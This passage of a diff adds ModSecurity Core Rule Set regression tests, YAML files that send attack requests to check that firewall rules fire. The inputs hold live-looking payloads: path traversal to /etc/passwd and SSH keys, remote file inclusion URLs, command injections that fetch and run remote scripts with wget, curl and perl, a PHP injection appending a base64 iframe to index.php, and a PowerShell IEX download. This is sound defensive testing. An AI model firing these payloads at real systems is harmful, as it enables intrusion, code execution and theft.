dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y"
output:
log_contains: id "921160"

63
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml Normal file
View File

@@ -0,0 +1,63 @@
---
meta:
author: "Andrea Menin (theMiddle)"
description: "HTTP Splitting"
enabled: true
name: 921190.yaml
tests:
-
test_title: 921190-1
desc: "New line char in request filename (1)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
uri: "/foo%0Abar"
output:
log_contains: id "921190"
-
test_title: 921190-2
desc: "New line char in request filename (2)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
uri: "/foo%0abar"
output:
log_contains: id "921190"
-
test_title: 921190-3
desc: "FastCGI variable injection: Nginx + PHP-FPM (CVE-2019-11043)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
uri: "/index.php/PHP%0Ainfo.php?QQQ"
output:
log_contains: id "921190"
-
test_title: 921190-4
desc: "PHP Settings injection: Nginx + PHP-FPM (CVE-2019-11043)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
uri: "/index.php/PHP_VALUE%0Asession.auto_start=1;;;?QQQ"
output:
log_contains: id "921190"

167
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml Normal file
View File

@@ -0,0 +1,167 @@
---
meta:
author: "Christian Folini"
description: "LDAP injection"
enabled: true
name: 921200.yaml
tests:
-
test_title: 921200-1
desc: "Testing for FP, this should not trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
method: POST
data: "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))"
uri: "/"
output:
no_log_contains: id "921200"
-
test_title: 921200-2
desc: "Testing for FP, this should not trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
method: POST
data: "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)"
uri: "/"
output:
no_log_contains: id "921200"
-
test_title: 921200-3
desc: "Testing for FP, this should not trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
method: POST
data: "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))"
uri: "/"
output:
no_log_contains: id "921200"
-
test_title: 921200-4
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=bar)(%26)"
uri: "/"
port: 80
output:
log_contains: id "921200"
-
test_title: 921200-5
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=printer)(uid=*)"
uri: "/"
port: 80
output:
log_contains: id "921200"
-
test_title: 921200-6
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=void)(objectClass=users))(%26(objectClass=void)"
uri: "/"
port: 80
output:
log_contains: id "921200"
-
test_title: 921200-7
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=eb9adbd87d)!(sn=*"
uri: "/"
port: 80
output:
log_contains: id "921200"
-
test_title: 921200-8
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=*)!(sn=*"
uri: "/"
port: 80
output:
log_contains: id "921200"
-
test_title: 921200-9
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=*)(uid=*))(|(uid=*"
uri: "/"
port: 80
output:
log_contains: id "921200"
-
test_title: 921200-10
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=aaa*aaa)(cn>=bob)"
uri: "/"
port: 80
output:
log_contains: id "921200"

23
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml Normal file
View File

@@ -0,0 +1,23 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "930100.yaml"
description: "Application attack LFI"
tests:
-
test_title: 930100-1
desc: "Path Traversal Attack (/../) encoded"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
FoobarHeader: "0x5c0x2e.%00/"
uri: "/"
output:
log_contains: id "930100"

100
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml Normal file
View File

@@ -0,0 +1,100 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "930110.yaml"
description: "Application attacks: Local file include"
tests:
-
test_title: 930110-1
desc: "Path Traversal Attack (/../)"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
FoobarHeader: "/../../../././..\\ ../../etc/master.passwd"
uri: "/"
output:
log_contains: id "930110"
-
test_title: 930110-2
desc: "Path Traversal Attack (/../) query string"
stages:
-
stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
Host: "localhost"
X-FTW: "This should trip"
uri: "/?arg=../../../etc/passwd"
output:
log_contains: id "930110"
-
test_title: 930110-3
desc: "Path Traversal Attack (/../) query string"
stages:
-
stage:
input:
dest_addr: "localhost"
method: "POST"
port: 80
headers:
Host: "localhost"
uri: "/"
data: "arg=../../../etc/passwd&foo=var"
output:
log_contains: id "930110"
-
test_title: 930110-4
desc: "Path Traversal Attack (/../) query string"
stages:
-
stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
Host: "localhost"
uri: "/foo../1234"
output:
no_log_contains: id "930110"
-
test_title: 930110-5
desc: "Path Traversal Attack (/../) query string"
stages:
-
stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
Host: "localhost"
uri: "/foo.../1234"
output:
no_log_contains: id "930110"
-
test_title: 930110-6
desc: "Path Traversal Attack (/../) query string"
stages:
-
stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
Host: "localhost"
uri: "/..foo"
output:
no_log_contains: id "930110"

97
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml Normal file
View File

@@ -0,0 +1,97 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 930120.yaml
tests:
-
test_title: 930120-1
desc: Remote File Access Attempt (930120) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /index.php?file=News&op=../../../../../boot.ini%00
version: HTTP/1.1
output:
log_contains: id "930120"
-
test_title: 930120-2
desc: Remote File Access Attempt (930120) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /index.php?file=News&op=/etc/passwd%00
version: HTTP/1.1
output:
log_contains: id "930120"
-
test_title: 930120-3
desc: Remote File Access Attempt (930120) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /index.php?file=News&op=../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00
version: HTTP/1.1
output:
log_contains: id "930120"
-
test_title: 930120-4
desc: "OS File Access"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
uri: "/?foo=arg&path_comp=.ssh/id_rsa"
output:
log_contains: "930120"

32
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml Normal file
View File

@@ -0,0 +1,32 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 931100.yaml
tests:
-
test_title: 931100-1
desc: Remote File Inclusion Attack (931100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php
version: HTTP/1.1
output:
log_contains: id "931100"

82
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml Normal file
View File

@@ -0,0 +1,82 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 931110.yaml
tests:
-
test_title: 931110-1
desc: Remote File Inclusion Attack (931110) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar
version: HTTP/1.1
output:
log_contains: id "931110"
-
test_title: 931110-2
desc: Remote File Inclusion Attack (931110) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar
version: HTTP/1.1
output:
log_contains: id "931110"
-
test_title: 931110-3
desc: Remote File Inclusion Attack (931110) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar
version: HTTP/1.1
output:
log_contains: id "931110"

143
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml Normal file
View File

@@ -0,0 +1,143 @@
---
meta:
author: studersi
description: None
enabled: true
name: 931120.yaml
tests:
-
test_title: 931120-1
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=file?
version: HTTP/1.1
output:
log_contains: id "931120"
-
test_title: 931120-2
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=ftp?
version: HTTP/1.1
output:
log_contains: id "931120"
-
test_title: 931120-3
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=ftps?
version: HTTP/1.1
output:
log_contains: id "931120"
-
test_title: 931120-4
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=http?
version: HTTP/1.1
output:
log_contains: id "931120"
-
test_title: 931120-5
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https?
version: HTTP/1.1
output:
log_contains: id "931120"
-
test_title: 931120-6
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https://foo.bar?
version: HTTP/1.1
output:
log_contains: id "931120"
-
test_title: 931120-7
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https://foo.bar?foo=bar
version: HTTP/1.1
output:
no_log_contains: id "931120"
-
test_title: 931120-8
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https://foo.bar&foo=bar
version: HTTP/1.1
output:
no_log_contains: id "931120"

194
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml Normal file
View File

@@ -0,0 +1,194 @@
---
meta:
author: studersi
description: None
enabled: true
name: 931130.yaml
tests:
-
test_title: 931130-1
desc: Remote File Inclusion Attack (931130)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=file://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-2
desc: Remote File Inclusion Attack (931130)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=ftp://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-3
desc: Remote File Inclusion Attack (931130)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=ftps://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-4
desc: Remote File Inclusion Attack (931130)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=http://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-5
desc: Remote File Inclusion Attack (931130)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-6
desc: Partial match
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://evilexample.com/
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-7
desc: Mismatching domains
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://example.com.evil.com/
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-8
desc: Mismatching ports
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://example.com:1234/
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-9
desc: Matching hosts
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://example.com/
version: HTTP/1.1
output:
no_log_contains: id "931130"
-
test_title: 931130-10
desc: Matching hosts and ports
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://example.com:1234/
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-11
desc: Subdomains
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=http://www.example.com/some/path
version: HTTP/1.1
output:
no_log_contains: id "931130"

68
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932100.yaml Normal file
View File

@@ -0,0 +1,68 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 932100.yaml
tests:
-
test_title: 932100-1
desc: System Command Injection (932100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf
version: HTTP/1.0
output:
log_contains: id "932100"
-
test_title: 932100-2
desc: System Command Injection (932100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php
version: HTTP/1.0
output:
log_contains: id "932100"
-
# Currently this will be blocked by apache before it gets
# to CRS. as a result we need to check for 400 from Apache
# We ideally want a OR output check.
# https://github.com/CRS-support/ftw/issues/19
test_title: 932100-3
desc: CSV Injection Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
encoded_request: "UE9TVCAvaW5kZXguaHRtbCBIVFRQLzEuMQpIb3N0OiAxOTIuMTY4LjEuMjMKVXNlci1BZ2VudDogY3VybC83LjQzLjAKQWNjZXB0OiAqLyoKQ29udGVudC1MZW5ndGg6IDY0CkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkCkNvbm5lY3Rpb246IGNsb3NlCgpkPTE7MjszOzQ7NVxuMTtAU1VNKDErMSkqY21kfCcgcG93ZXJzaGVsbCBJRVgod2dldCAwci5wZS9wKSdcIUEwOzM="
output:
status: [403, 400]
#log_contains: id "932100"

2833
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml Normal file
View File

File diff suppressed because it is too large Load Diff

61
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml Normal file
View File

@@ -0,0 +1,61 @@
---
meta:
author: theMiddle
description: RCE Bypass
enabled: true
name: 932200.yaml
tests:
-
test_title: 932200-1
desc: globbing patterns
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?host=www.google.com;/bin/ca?+/et*/passwd
version: HTTP/1.0
output:
log_contains: id "932200"
-
test_title: 932200-2
desc: uninitialized variable
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?host=www.google.com;cat+/etc/%24%7Ba%7Dpasswd
version: HTTP/1.0
output:
log_contains: id "932200"
-
test_title: 932200-3
desc: bash function
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?host=www.google.com;cat+/etc/%24%28echo%29passwd
version: HTTP/1.0
output:
log_contains: id "932200"

53
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml Normal file
View File

@@ -0,0 +1,53 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 933100.yaml
tests:
-
test_title: 933100-1
desc: PHP Injection Attack (933100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=<?exec('wget%20http://r57.biz/r57.txt%20-O
version: HTTP/1.0
output:
log_contains: id "933100"
-
test_title: 933100-2
desc: PHP Injection Attack (933100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by5wb2Rnb3J6Lm9yZy96dW8vZWxlbi9pbmRleC5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT48P3BocA%3D%3D%5C%22)%2C%20FILE_APPEND)%3B%20%3F%3E
version: HTTP/1.0
output:
log_contains: id "933100"

350
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml Normal file
View File

@@ -0,0 +1,350 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933110.yaml
tests:
-
test_title: 933110-1
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
output:
no_log_contains: id "933110"
-
test_title: 933110-2
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: a.php
port: 80
uri: /upload1
output:
log_contains: id "933110"
-
test_title: 933110-3
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X_Filename: a.php
port: 80
uri: /upload2
output:
log_contains: id "933110"
-
test_title: 933110-4
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: a.php
port: 80
uri: /upload3
output:
log_contains: id "933110"
-
test_title: 933110-5
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: a.php..
port: 80
uri: /upload4
output:
log_contains: id "933110"
-
test_title: 933110-6
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: a.phtml
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-7
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fda.phtml......
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-8
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fda.php5
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-9
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fda.php5
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-10
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fda.php7
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-11
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
output:
no_log_contains: id "933110"
-
test_title: 933110-12
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: fda.php5...
port: 80
uri: /upload5
output:
log_contains: id "933110"
-
test_title: 933110-13
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X_Filename: fda.php5...
port: 80
uri: /upload6
output:
log_contains: id "933110"
-
test_title: 933110-14
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X_Filename: fthisfewfda.php.
port: 80
uri: /upload7
output:
log_contains: id "933110"
-
test_title: 933110-15
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fthi/sfewfda.php.............
port: 80
uri: /upload8
output:
log_contains: id "933110"
-
test_title: 933110-16
desc: PHP script uploads
stages:
- stage:
input:
